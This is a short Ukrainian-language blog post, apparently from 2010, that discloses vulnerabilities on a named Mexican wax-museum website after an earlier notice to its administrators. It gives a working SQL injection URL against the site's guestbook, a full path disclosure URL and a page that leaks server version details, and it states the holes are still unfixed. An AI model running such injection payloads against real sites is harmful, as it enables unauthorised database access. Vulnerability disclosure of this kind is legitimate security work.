Уразливості на www.museodecera.com.mx

16:02 18.09.2010

18.01.2010

У травні, 18.05.2009, я знайшов SQL Injection, Full path disclosure та Information Leakage уразливості на сайті http://www.museodecera.com.mx. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

18.09.2010

SQL Injection:

http://www.museodecera.com.mx/guestbook/index.php?action=jump&id=-1%20union%20select%20version()

Full path disclosure:

http://www.museodecera.com.mx/guestbook/config.inc.php

Information Leakage:

http://www.museodecera.com.mx/guestbook/index.php

В meta-тегах виводиться інформація про версію PHP, MySQL і веб сервера.

Дані уразливості досі не виправлені.


Leave a Reply

You must be logged in to post a comment.